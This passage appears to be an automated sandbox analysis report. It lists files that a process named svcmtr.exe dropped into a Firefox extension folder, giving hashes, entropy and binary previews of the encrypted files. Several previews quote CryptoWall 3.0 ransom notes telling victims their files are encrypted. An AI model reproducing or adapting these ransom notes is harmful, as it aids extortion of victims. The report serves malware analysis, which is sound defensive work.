                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..W^.$i.j.{]S<^5e.p...6..@r.ix:.|.,|C.2.t.#~z.Y.n....,y2R+}.r|HG...c8tzDh...r"..t.!.G.yq.d9....K..../..,.....Q 2wn.e0g..Y....R..*Q[AW...g{.b.P?.z...H.@..h./..YI.....M......l.{.....N..L..b...(..U..n.o...o~&....T?`Ma......).a.1......<.@.2..{.q<8.7....o..8...e.O....J/..B. .....<yU.q..H.Q$.h.1..P.o..i..>7...rV..j..X;.?.....'. ih.......'.h3.~W@.HNg......=..lIU.6")Y..."...QVE.o'........A.@B..W.$..z.....<..5..\?..UhnK...c ^...|..@&DF.*.$@y..c...4......(.:,.H....Fo.,....F...F.OO....).N...B.d........7...b3....IRg......5m...;6.....#<._@. ..rK.G.K......*!..L.Qi.............k_......7.=T..Wj.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\trophy.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1150
                                                                                                                          Entropy (8bit):7.525590156814136
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2f9nbcSYbBY18l+COyU5X03otj3GZWfkTgRC:c+9U40oDg49nr5phyBSyZWsTn
                                                                                                                          MD5:BDC97794EDD5B1772D2CEB2DC7DF5750
                                                                                                                          SHA1:FFF9F350F91AE298529F8EA7CA933EB4C7AED149
                                                                                                                          SHA-256:337F0418848F46258C01186A9E86A5D721AC820D9B6B6CD53ECCF549397033D3
                                                                                                                          SHA-512:33510588F61AB3FB2B89CC0AE585772754DA314647796CEB1309A0BBAB27201BCD70F90B8455F9FA9F503009421D096D482183DA9A74F2267F16C07A1D7111C6
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..,...G..|.z.>;............qI>.}{.%.|...8..j..(j.. E.......M..^.&dX.w...O^..y..T..Y..+M.)...I..9.]...z...8j...p...'.E......I..J8.Z:+..#.~.#.]-......|YP.`..}..q.Q..k.`..e....d..X.mV.4$..=..oN.....?...o.f.:./5mq.'.la....!....G.O...^=..2..&`W.....}!...'....@@."),NpgH/.?9^.Fy..x.(H..a.....t...*...8..$..I]......6C..p....G....|..g..:#.v...h..QEwx.p}..0..."T....j.t...$O.UG.....n0..].3....6.@6.v........Z...M...8_r0.pP.k....x..g.......(].wn.:..{...F. ..?.I..+P|A.b9.S..="...7._qs..%..0.2..........S..+^....b.w.+...iP,.vT.....c..2T]...l.........<2{]-...=...Z..3.PO..C"W.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\trophy_active.svg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2590
                                                                                                                          Entropy (8bit):7.870620535052442
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg4RgcD48YonE7lQW48cBBtWcSwANYn2c/ytQ0GjTCHY/9I5:cztoDLgc3hns48cRSJSn2RiHj2HYFC
                                                                                                                          MD5:259ECBFB896CD4FF062A0EE89EBAAF88
                                                                                                                          SHA1:972C8C9B58E68CCF6AE232C94BDAE9855E254039
                                                                                                                          SHA-256:15A14326CB0F013D3E3B2F98A4E152019AA1972779B2870A771A43EFA8C9338A
                                                                                                                          SHA-512:4AB438C6603FB1F7CC090BBF1184F3FC1C37BCE2ACEE3D6F7BC43673ADD9F7CB2BAED50EF36D07CE4784A9C3110D99267DE67FC1C10D40341A3BBC11BC6F69B2
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....h..[..........t.....np.z....`..1k.-o.~.....O.{......)............).[....?.........BI..5U_..E. D...%..Q..G...<..x.0..ph..XW...........o.....1.V/.......%C..........`.n+.;......VK.U..p....'.?...q...)..r..n.C....b..N.`.:..h$F..gP....V.n..8\$R.<..`I..WkN.....:yQ.yU..6..G..T..a$.>B=..i...X3..w..n....(.^<.....E.x.....Ur..q.WJ.=P..a..X>(.K.....C..=..~..A.e,..0.GQ..+...Wjk.W...X.y.p..m.H/.w..A..(y...>.8,y 0...V..q3... ....J....ug...|R....M..k...J./Q.V.)..UA......c;y..s.M.@.....y..q.u.o...cK...e...zW....3Y!.R....g.......~/...n.V..r.Y.k......d..i.{....H....`......z0.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet1_utility.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2302
                                                                                                                          Entropy (8bit):7.826419728627804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgiEkUCtA2MM68u42oaNDjLzwLVeHddrq9zVNuvk7Pc:cztoDB9Bn2JNTzwQHjmjuso
                                                                                                                          MD5:D3D62C72D54F23ABE7C8227EA1667C03
                                                                                                                          SHA1:DB8C07BC3E6DFF6407DF78CE1670370CB8BB5E3A
                                                                                                                          SHA-256:2FB614D86EE203C18B0EDF974BD4EE5D930667925CFCF08E0E1DA02D57644753
                                                                                                                          SHA-512:1B831BC9F1B4086B11884F45F1ACB5800B9ED3DB3E81F85CF5BDF49CE8C7EB0590934382BB813E84375F8DBCD33323D5621082BFD6061AAB3F984D70E851B035
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..e....N...<..7i.P...Jb7.H..B.o5...............P......^B.[.I..B..*.qw}..W:J..i...x...Cc..P...d..Fq.......g.+`";S.....4U....sHDb..sHE50..(...e..g.HBX.?.......F@'.....r.\.ll......x...|W.b.v[..).yWv.......Lq..T...re.G~........wlD..#....O../.TW..FP..3..B..f......a.s..To|.gS........:.E.Q......Y"h...i..;i......8U...HQe.`...E.uGLv...d.iDw.....1...X"lX.6..+....7.D....-..t..l.a.......=.<.].B..y}A...{.dG...];.......u@.Y...7LP.G..)...;T..4....kG.Q..T.^.C.l.N..-Z.........8..".yM.j..k. ....).[).r..5..i.\....p.s%.C.....8.e.......?..W."._K..uh.. _<v.....I..{<.......#.x.....ig....9n@

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet1_values.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1326
                                                                                                                          Entropy (8bit):7.632306020627354
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S20ol/SD89LwUsXZKZnqvC4Uauzp1Pc1iXktc8sL8:c+9U40oDgJD89LKXZKZ2Ya4YZL
                                                                                                                          MD5:692DBD5C5850433802A6A799053D6DD4
                                                                                                                          SHA1:B8EC234BDF74EFF7E51C98CCCE7FE1E66C65014D
                                                                                                                          SHA-256:8B5CB524F2FFF726E9031EE36A8D90C35F0ABF743943BC8B457D9798BD58E268
                                                                                                                          SHA-512:1199C7ADCCE8D35007A1D27B2043DFD6D16781B9623204D37802855366C3AFDC24F7BDD21B6F5AEE7D71A3891B5E8EEC2106CD5A96A3BFB7C2EBF3B40864D7D0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....}..3.(.%.E...........*....Ap......S......>...ee..Y..'.....c...QZ?..Q.h..Mf...y....=....a.R"....z.Q3...e..O2o{. ..O..............C^v......h.?.nM.......}j[y~...1\.&3...W...........w.0.gu.@f&..e...~...L......<....A..._.q`..].*.+.Q......IO<[#L0ja.,..Q...TJ.~.'..L.Z....VZ..s...+..wg.y..(...\.L.'./H4wI..............l..#......s/9Uk0.f..-'..!........K.K.e........},m.-&.Rb.l.71...As...q..5-.......].(H.........)ns.....$t...k@..j:.sj+.r........J..nn......IL"U.5.X.`...>S3......-.'-..........s.w$.m......j.M!R$.........J..5+...g.O.<...n|}]w..J.....sL..1.+..b.>......X...c..`y.t.b<..sh|

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet2_utility.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1070
                                                                                                                          Entropy (8bit):7.439829461309493
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2rNcKSz8AREnt0zmf105Hplv2jQ2:c+9U40oDgrKSOniHNYQ2
                                                                                                                          MD5:2719BA1B78902F26E74ED99A917C2C76
                                                                                                                          SHA1:59916636C02BBBC639C7B9E19766A63BFBBF96EA
                                                                                                                          SHA-256:777F5EA7ED4C2B28F24634A7ACDEBC531E69D9E1CF109A6703D61ED6E7A7941B
                                                                                                                          SHA-512:8C6B3C6159D532DCF81FD2AE8EF7A19139B571DCA8A4C28E4CD54D3399A3B3D70C288E1C4B188C55DCF069449100B5D132718C362D1D586B3F45AEAA8230A7A3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......B....o.......M....ja2.[4.@'.)..K.!......_e..A}w5..w@.5rc.L..L.B....^...aL.>.....:.0... .%...\%Q..G...(w...7.2.._..;..z......n......V6.G...kc.L.c.h....#U~.....f.Q.HW.....@=....^......&Iw).P$u.AE5...'..m?._.....X.K.L.<.YIs.8....|.......{.m..eqk/.s_...q+.:....Q....r.O!..@V..c.iW.u..;.....Y....tFb.A....".dB'..._M...:.....(C..'...@F.........9X..b..(.......D#b.|.fC.#ch.mS._...ew.P|.H;h.)..........M...>1e.(..x..?9..m.i)[....D.D....7....TF.. ^..b..1p........Yw7fQ....b6...&%+.F$Ox.J.).q..pOyU....1...O..^.P..+..(p1(..C..C.Q.F.E.B..o~.#.g....e...N.Vz.......-.o[\..S.

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet2_values.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2526
                                                                                                                          Entropy (8bit):7.845814175974683
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgAwdm0owiej8XXk6MaeUXTpHVqCzVHiNVhDLjkGyrzwNxhuB:cztoDgdmoRj8XxMaeUzqGVHi/hHIVCxg
                                                                                                                          MD5:2475952EFF1B57B7538306162B3D17C6
                                                                                                                          SHA1:CFED4468ACD0CA441DC0E2480266D87282E76948
                                                                                                                          SHA-256:2C9133983967747C64B7C91A1EDF202EB40688E13DD116CA623E2B673E37E74B
                                                                                                                          SHA-512:DCE8FD29254F80C834F5F918E64A1D0287940BF626BCE7BF8363D1565726D09FC97682C1AB2BF643692F23E2806B1D6730D3865A81DB51B88ED663113BB78026
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......S.y.lw.....<....G.f.K.BF...,w.["..k...:.v......XW..<Y.C.g..y....)..Rt.<.hP...,.*..!.]...x..f........m.o....aX...G?..9....Vk[...X..........!>......c..aG.3...'.w...M.e.O5|% .!....R..,...{._.L....9./.....+.Z%.v..Z....)..b....IM...>A..sL..]...(.....>.i.M.t.T..L.W.q{^...!^c.../b..H..k."...P3Y...B.Q....z....!o..=....jK..(.!...;.....G....M..b.5.6E.....+.......W{.@......|..pk.V3.....}Y.U.O.r.P...."zk..R.;.%c.....0k....=.jW.*.T...y*1U}m..0...wU..[..<.X.~).j.!.U.2....3.W.].......4Ph..5...S Sj.T2h.;SH-.I....Ix:l.3.0.y.M.t...Lw8.q..\l.+..b.+.?..k4..m...g~F.{..:J..Y.:.Bs

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet3_utility.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2206
                                                                                                                          Entropy (8bit):7.811394082974455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg/lOJo9Ux6ZiLkyHNE4nemQiiSA0uQzDkoqqQLgp:cztoDJoK6ZiwQRe/idhlRLp
                                                                                                                          MD5:ED706464FBFDD3A0FAFAE99C6EBAE4A7
                                                                                                                          SHA1:3CBA12BBBDE44A14E0156F9017E1AA3A24AE093B
                                                                                                                          SHA-256:29DCBDC12E4F7328B1C12CBF1CA42FAACF76950ED6E151D233A2B65744B54097
                                                                                                                          SHA-512:8C8CC2B203265758890B33A20BB6502040CE8487CF12F7ED5AE5989E01A4BE78E7EA3B805DCAB36A9F637BD9DC5EF6196303FCF1BFD395E0415E06140D8C6BEB
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...h.X.g......9.....ys.!{xd!.}^?[..=.Y.D.......:.f7Ez...#=....d....T............B..k..>K..h;Tdz:...*t..C..0uV.t^.J.^.tl.u....I.!}.>!....O.C.....^............`z.T.(....$.K8s.. Y#".....q=...#.sh..oy....A...(cQ...%u5....m.39..(.....D...p..a.........,g.Qs..k.....A..Eg......L......$...}.R4.>.B... .V.l$.[.#...n...Y..^a........}=R.:.#..F..(R.(...o..<.>.M.5@"... ...|bY33.E.Zk....w......eF.%B.P......Q.....VT...;.O........r.d..n.'f...2._.._."9..C...r...}{.1*+.}....F..p..5.....Y.f.g..............;...f5..T..Z.u.\.Gm...s....Q.......db..f-.cv..q..._...Q.7....!.A..i....+.......

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet3_values.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3054
                                                                                                                          Entropy (8bit):7.882035769238676
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDghoKRLDQfckwMegx/K1tPxdXMsOIUJG90e1g7fEJr4DlEivHnYWySGfF:cztoDFKNGcL5XMsOIUJWnkEJr4DlJvHE
                                                                                                                          MD5:288089D43665B03B7959CC608CE96812
                                                                                                                          SHA1:4BAD023B9914A6396FF13A7D820B41C5C9BB307C
                                                                                                                          SHA-256:FB36814F65F4CD05AD8A76EDE901598C5D52EA27C0432D933B45306A8BEC1307
                                                                                                                          SHA-512:A21BC58BFA91309CDD0D945695EEB2C9108EB6AD78A749C30C134E1514EA6E703DBC6A5EBCFD1B67F8EE3291309221C636CBFBE129A9A5B1321280B785704F60
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..V..J.!V.2.R&..(II...#.|...<~c...0%.$..4I...2u.fez8E..".i.8]#.+.....?. .p.H\p.....N..T....gK..s.zd......B.^......./.M.^FR. ....J.PO..@.zS.1j*B'...*.f.h^W....?#9DH>..."......s.....DyV2...r@M.=......lz.f.d......i..""..+r...:p*MQu.|..=.".D..............%h2..P....Hl.3.r..=.........p..f2....m5W.........P.*.].t..8.4....4..R..v...'...K^.:Rr*4....'A......(.X0x ....XLb\...U&X`.+..[...1.....1.....g..o...:=..c..>(...X..q..z.7..UUg.u...K..m.....v..u...F,i........d.$...2..r...y.mA.]A)...TF\8r.zW.W.".9M:3:m.+<.`....r.4.u:.D..8.bB...Q.j.... ...R.i..+...u.....2`.A....4...?..

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\snippets\snippet4_utility.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2398
                                                                                                                          Entropy (8bit):7.828955828099153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgsrA0DT48h5XWzYTwY7GTX4A/8F2F3qxF9sJtxpatfDV:cztoDb5485mY6TX40qxF9sJFat7V
                                                                                                                          MD5:C20BA25A277E3D9F2F9D964DD56E7D87
                                                                                                                          SHA1:50DF048E1C15682E64B50BFE2ABC477ECD373ECA
                                                                                                                          SHA-256:6F652679A8DCFE9889AC1E2DB7E392ED3F84B11F4013503B5D5729F59FBF68AE
                                                                                                                          SHA-512:D7D6A4B6B1A62D65E835BDB430791D9658830982FF212B4AF1F8B4E62E11BC9CFCFB7F2818C8AD10461E5BDEADA68A9C1833206CBD46D3E139FBB1F1BEC813BC
                                                                                                                          Malicious:false
